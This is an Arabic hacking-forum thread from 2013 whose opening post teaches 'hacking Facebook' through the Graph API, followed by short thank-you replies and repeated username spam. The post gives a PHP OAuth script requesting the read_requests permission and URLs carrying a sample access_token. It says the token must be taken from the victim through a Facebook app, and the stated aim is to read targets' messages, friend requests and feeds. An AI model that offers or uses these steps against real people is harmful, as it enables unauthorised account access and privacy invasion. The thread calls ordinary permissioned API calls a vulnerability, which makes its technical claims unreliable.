رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

Twi[L]ighT Dz · 21 ديسمبر 2013

السلام عليكم و رحمة الله تعالى و بركاته

كيف حالكم عناكب :smile:

اليوم أنا جاي أشرح لكم إستغلالات ثغرة في الفايسبوك
هي صعبة قليلا لكن أتمنى أن تتجاوبوا معي
تمام نبدأ على بركة الله :msn-wink:

Graph API Exploit

كما يعلم الكل أن الفايسبوك يحتوي على ملايين المشتركين
و بالتالي فهو يمثل المكان الأمثل لتطبيق مخططاتنا في الإختراق

Graph API Exploit

رغم أن هاته الثغرة إستغلالاتها خطيرة
و أغلب المبرمجين الآن يستغلونها في التحكم بحسابات الفايسبوك
لأن المعلومات التي تقدمها مهمة جدا
إلا أنني لا أجد لها شروحات في المنتديات هناك من سيقول أن الثغرة تافهة
أنا أقولك لا أغلب الإستغلالات بقيت خاصة بمكتشفيها و لم يتم تسريبها في المنتديات
لخطروة إستغلالاتها

فبخبرة قليلة من البرمجة تتمكن من قراءة الرسائل الخاصة لأي حساب تريد
أو إرسال رسائل بأي حساب على الفايسبوك
دون أن ننسى أنها تقدم لنا معلومات تمكننا من إختراق الفايسبوك الهدف

ما هو ال Facebook Graph Api ؟

هو الرسم البياني لل Api
أي جوهر منصة الفايسبوك

برمجة منصة الفاسيبوك مبنية على graph api
و من يستطيع التحكم في ال api
سيتمكن من قراءة و كتابة معطيات في الفايسبوك
بل سيطلق ثورة في إختراق الفايسبوك

الآن هل تريدون اللعب بال Graph Api ؟

حقا ؟

أوكي تابعوا معي الآتي

جرب أكتب الآتي

https://graph.facebook.com/username

غير Username بحساب الضحية
تطلعلك معلومات كالآتي:

كود:

{    "id": "10000000565",    "name": "name of victim",    "first_name": "f name",    "last_name": "l name",    "link": "http://www.facebook.com/victim",    "username": "victim",    "gender": "male",    "locale": "en_GB" }

قراءة طلبات الصداقة للضحية :

تتم قراءة طلبات الصداقة للمستهدف من خلال قراءة Graph Api عن طريق إصدار

طلب "HTTP GET" لمستخدم access_token بإذن أو رخصة read_requests

التطبيق في المتصفح كالآتي:

كود:

https://graph.facebook.com/USER_ID/friendrequests

مع العلم أن :
USER_ID = username
www.facebook.com/username

و عن كيفية الإستغلال
عبارة عن CODE PHP بسيط يوضح الإستغلال في قراءة طلبات الصداقة للضحايا

PHP:

<?php
    $app_id = 'YOUR_APP_ID';
    $app_secret = 'YOUR_APP_SECRET';
    $my_url = 'YOUR_URL';
    $code = $_REQUEST["code"];
    echo '<html><body>';
    if(!$code) {
    // Get permission from the user to publish to their page.
    $dialog_url = "http://www.facebook.com/dialog/oauth?client_id="
    . $app_id . "&redirect_uri=" . urlencode($my_url)
    . "&scope=read_requests";
    echo('**********top.location.href="' . $dialog_url . '";</script>');
    } else {
    // Get access token for the user
    $token_url = "https://graph.facebook.com/oauth/access_token?client_id="
    . $app_id . "&redirect_uri=" . urlencode($my_url)
    . "&client_secret=" . $app_secret
    . "&code=" . $code;
    $access_token = file_get_contents($token_url);
    $notifications = "https://graph.facebook.com/me/friendrequests?"
    . $access_token;
    $response = file_get_contents($notifications);
    $resp_obj = json_decode($response,true);
    echo '<pre>';
    print_r($resp_obj);
    echo '</pre>';
    }
    echo '</body></html>';
    ?>

إذا أردت رؤية الأشخاص الذي عمل لهم بلوك

كود:

https://graph.facebook.com/APP_ID/banned

إذا أردت رؤية إن كان عمل لشخص محدد بلوك

كود:

https://graph.facebook.com/APP_ID/banned/USER_ID

سأوضح أكثر الإستعمال بالمتصفح

https://graph.facebook.com = API GRAPH
بروفايل الفايسبوك المستهدف = /me/
متغير يمكننا تغييره بحسب الحاجة مثلا أردت رؤية = friendsnewsfeed أغيره إلى "home"
227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

يمثل ال access_token

و يجب الحصول عليه من الضحية

بما أن البعض لم يفهم عمل ال php code
هو يستعمل فقط لقراة طلبات الصداقة ..الرسائل ...
ما إلى ذلك يمكنكم التعديل عليه ليتماشى مع الحاجة

بخصوص الحصول على الـ access_token
سهل عن طريق تطبيق فايسبوك

ضروري تغيير /me/ بــ username الشخص المستهدف

و بالتالي الإستغلال يكون كالآتي :

لرؤية طلبات الصداقة للضحية

كود:

https://graph.facebook.com/me/friends?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

لروية newsfeed للضحية

كود:

https://graph.facebook.com/me/home?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

لرؤية profile freed
يعني رؤية البروفايل www.fb.com/username

كود:

https://graph.facebook.com/me/feed?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

أتمنى أن أكون اليوم بشرحي هذا لكم قد وفقت في توضيح بعض الأمور لكم
حتى و لو كانت قليلة و لكنها مجرد بداية

ستمكنكم من دخول إختراق الفايسبوك من بابه الواسع
هي مجرد فكرة و أنتظر منكم تطوريها

و أي شيء أنا هنا في الخدمة

PsYcO_GhOsT · 21 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

انا لم افهم اي شى لكن شكرا جزيلا ايها المبدع
تقبل مروري

Twi[L]ighT Dz · 21 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

PsYcO_GhOsT قال:
انا لم افهم اي شى لكن شكرا جزيلا ايها المبدع
تقبل مروري

مالذي لم تفهمه أستطيع أن أوضح لك

و لو كان يجب أن أعمل لكم شرح فيديو أنا في الخدمة

شكرا على مرورك :smile:

saaddev · 23 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

thnxxxxxxxxxxxxx

Twi[L]ighT Dz · 23 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

saaddev قال:
thnxxxxxxxxxxxxx

your welcome bro

mario love · 27 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

nice

xbahaa · 29 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

مشكور اخيييييييييييييي ر اشوف اشرح بدي اضهر الرابط الان

xDrKeeFx · 29 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

جزاك الله الف خير , بميزان حسناتك

Twi[L]ighT Dz · 29 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

شكرا على الردود المشجعة

جزاكم الله ألف خير

إن شاء الله

oussema97 · 29 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

so nice

soufien · 31 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

Merci

haithemm · 31 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

shoukraaaan

Fsx · 31 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

شكرا لك يا اخي ولكن لم افهم كيفية استخدام ال PHP CODE للحصول على ال ACESS TOKEN ، هل يجب تحميله في موقع و ارساله للشخس المراد إختراقه ؟

dragunov _dz · 31 ديسمبر 2013

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

الطريقة مو شغالة

أسطوره · 1 يناير 2014

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

عليكم السلام رحمه الله بركاته

اشكرك اخي الفاضل علي الموضوع المميز

اشكر كل عضو مميز في المنتدي اكثر من روعه تقبلوا خالص تحياتي وتقدري
انا عضو جديد في هذا المنتدي الذي دائما يطرح كل ماهو جديد ومفيد

EleScargo · 2 يناير 2014

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

شكراً أخي

khalil97 · 3 يناير 2014

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

merciiiiiiiiiiiii

assoutlm · 3 يناير 2014

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

..

salahmahdy · 3 يناير 2014

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

بدايتى معكم وارجو ان تكون موفقة وانا لن استغل شئ الا فى الخير ولدفاع عن دينى وبلدى

Twi[L]ighT Dz · 3 يناير 2014

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit

شكرا على ردودكم المشجعة
تم تحديث الموضوع بخصوص ال php code
هو لا يأخذ ال access_token
من الضحية بل يستغل عن طريق access_token

بالإضافة لأخذ ال access_token
عن طريق تطبيق فايسبوك

[CENTER]السلام عليكم و رحمة الله تعالى و بركاته كيف حالكم عناكب :smile: اليوم أنا جاي أشرح لكم إستغلالات ثغرة في الفايسبوك هي صعبة قليلا لكن أتمنى أن...

:-. Soldier of Allah .-:

New Member

:-. Soldier of Allah .-:

New Member

:-. Soldier of Allah .-:

New Member

New Member

New Member

:-. Soldier of Allah .-:

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

:-. Soldier of Allah .-: